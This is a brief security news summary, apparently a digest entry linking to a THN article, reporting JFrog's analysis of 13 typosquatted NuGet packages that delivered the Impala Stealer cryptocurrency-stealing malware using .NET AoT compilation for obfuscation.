"Cryptocurrency Stealer Malware Distributed via 13 NuGet Packages"

Researchers have described the inner workings of the cryptocurrency-stealing malware that was spread via 13 malicious NuGet packages as part of a supply chain attack aimed at .NET developers. The typosquatting campaign, detailed by JFrog late last month, impersonated legitimate packages in order to execute PowerShell code designed to retrieve a following binary from a hard-coded server. The two-stage attack leads to the deployment of Impala Stealer, a .NET-based persistent backdoor capable of gaining unauthorized access to cryptocurrency accounts. The payload used a rare obfuscation technique known as '.NET AoT compilation,' which is significantly more covert than using off-the-shelf obfuscators while still making the binary difficult to reverse engineer, according to JFrog. .NET AoT compilation is an optimization technique that enables apps to be compiled to native code in advance. This article continues to discuss the distribution of cryptocurrency stealer malware via 13 malicious NuGet packages.

THN reports "Cryptocurrency Stealer Malware Distributed via 13 NuGet Packages"